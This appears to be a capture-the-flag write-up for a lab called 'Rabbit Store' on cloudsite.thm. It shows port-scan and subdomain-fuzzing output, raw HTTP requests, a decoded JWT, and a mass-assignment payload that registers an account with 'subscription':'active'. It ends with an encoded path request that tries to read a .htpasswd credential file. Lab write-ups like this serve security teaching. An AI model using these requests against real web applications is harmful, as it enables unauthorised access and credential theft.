Rabbit Store
PORT STATE SERVICE22/tcp open ssh80/tcp open httpPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 256 3f:da:55:0b:b3:a9:3b:09:5f:b1:db:53:5e:0b:ef:e2 (ECDSA)|_ 256 b7:d3:2e:a7:08:91:66:6b:30:d2:0c:f7:90:cf:9a:f4 (ED25519)80/tcp open http Apache httpd 2.4.52|_http-server-header: Apache/2.4.52 (Ubuntu)|_http-title: Did not follow redirect to http://cloudsite.thm/3397/tcp closed saposs4369/tcp open epmd Erlang Port Mapper Daemon| epmd-info:| epmd_port: 4369| nodes:|_ rabbit: 2567225672/tcp open unknown32469/tcp closed unknown44774/tcp closed unknown51612/tcp closed unknownService Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernelHTTP 80
Section titled “HTTP 80”Redirects to http://cloudsite.thm/
Login → http://storage.cloudsite.thm/
Tech Stack
Section titled “Tech Stack”cloudsite.thm
- Apache HTTP Server 2.4.52
- Ubuntu
- OWL Carousel storage.cloudsite.thml
- Apache/2.4.52 (Ubuntu)
- Express
vhost-fuzzer cloudsite.thm ~/Wordlist/SecLists/Discovery/DNS/subdomains-top1million-20000.txt http://cloudsite.thm --fw 18 03:26:51 pm
/'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/
v2.1.0-dev________________________________________________
:: Method : GET :: URL : http://cloudsite.thm :: Wordlist : FUZZ:/SecLists/Discovery/DNS/subdomains-top1million-20000.txt :: Header : Host: FUZZ.cloudsite.thm :: Header : User-Agent: PENTEST :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response words: 18________________________________________________
storage [Status: 200, Size: 9039, Words: 3183, Lines: 263, Duration: 268ms]POST /api/login HTTP/1.1Host: storage.cloudsite.thmContent-Length: 42Accept-Language: en-GB,en;q=0.9Accept: application/json, text/plain, */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36Origin: http://storage.cloudsite.thmReferer: http://storage.cloudsite.thm/Accept-Encoding: gzip, deflate, brConnection: keep-alive
{"email":"test@test.com","password":"123"}signup
Section titled “signup”POST /api/register HTTP/1.1Host: storage.cloudsite.thmContent-Length: 50Accept-Language: en-GB,en;q=0.9User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: http://storage.cloudsite.thmReferer: http://storage.cloudsite.thm/register.htmlAccept-Encoding: gzip, deflate, brConnection: keep-alive
{"email":"john@test.com","password":"password123"}sign up user
Section titled “sign up user”http://storage.cloudsite.thm/dashboard/inactive
GET /dashboard/active HTTP/1.1Host: storage.cloudsite.thmAccept-Language: en-GB,en;q=0.9Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6ImpvaG5AdGVzdC5jb20iLCJzdWJzY3JpcHRpb24iOiJpbmFjdGl2ZSIsImlhdCI6MTc0OTcwNzEyOSwiZXhwIjoxNzQ5NzEwNzI5fQ.bAvx1OLSliPZLY7cv0It7TcOAnka4ip4XtSsMoOWZGEConnection: keep-alivejwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6ImpvaG5AdGVzdC5jb20iLCJzdWJzY3JpcHRpb24iOiJpbmFjdGl2ZSIsImlhdCI6MTc0OTcwNzEyOSwiZXhwIjoxNzQ5NzEwNzI5fQ.bAvx1OLSliPZLY7cv0It7TcOAnka4ip4XtSsMoOWZGEHeaders = { "alg": "HS256", "typ": "JWT"}
Payload = { "email": "john@test.com", "subscription": "inactive", "iat": 1749707129, "exp": 1749710729}
Signature = "bAvx1OLSliPZLY7cv0It7TcOAnka4ip4XtSsMoOWZGE"- server checks signature
- secret not crackable
Mass assignment
Section titled “Mass assignment”Possible field of the user object.
POST /api/register HTTP/1.1
{ "email":"john2@test.com", "password":"password123",}POST /api/register HTTP/1.1Host: storage.cloudsite.thmContent-Length: 73Accept-Language: en-GB,en;q=0.9User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: http://storage.cloudsite.thmReferer: http://storage.cloudsite.thm/register.htmlAccept-Encoding: gzip, deflate, brCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6ImpvaG4yQHRlc3QuY29tIiwic3Vic2NyaXB0aW9uIjoiaW5hY3RpdmUiLCJpYXQiOjE3NDk3MDc1OTksImV4cCI6MTc0OTcxMTE5OX0.6Z4Y28KYisl8K-Xx2IZ2t1tG9QjWeF1NYr0J1yjYgoMConnection: keep-alive
{"email":"max@test.com","password":"test123","subscription":"active"}HTTP/1.1 201 CreatedDate: Thu, 12 Jun 2025 06:40:56 GMTServer: Apache/2.4.52 (Ubuntu)X-Powered-By: ExpressContent-Type: application/json; charset=utf-8Content-Length: 42ETag: W/"2a-nMoFx54+czTntmSLXl3mqIsZV4A"Keep-Alive: timeout=5, max=100Connection: Keep-Alive
{"message":"User registered successfully"}
Path traversal
Section titled “Path traversal”.htpasswd
GET /assets/%2ehtpasswd HTTP/1.1Host: storage.cloudsite.thmAccept-Language: en-GB,en;q=0.9Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://storage.cloudsite.thm/assets/plugins/testimonial/Accept-Encoding: gzip, deflate, brCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6ImpvaG4yQHRlc3QuY29tIiwic3Vic2NyaXB0aW9uIjoiaW5hY3RpdmUiLCJpYXQiOjE3NDk3MDc1OTksImV4cCI6MTc0OTcxMTE5OX0.6Z4Y28KYisl8K-Xx2IZ2t1tG9QjWeF1NYr0J1yjYgoMConnection: keep-alive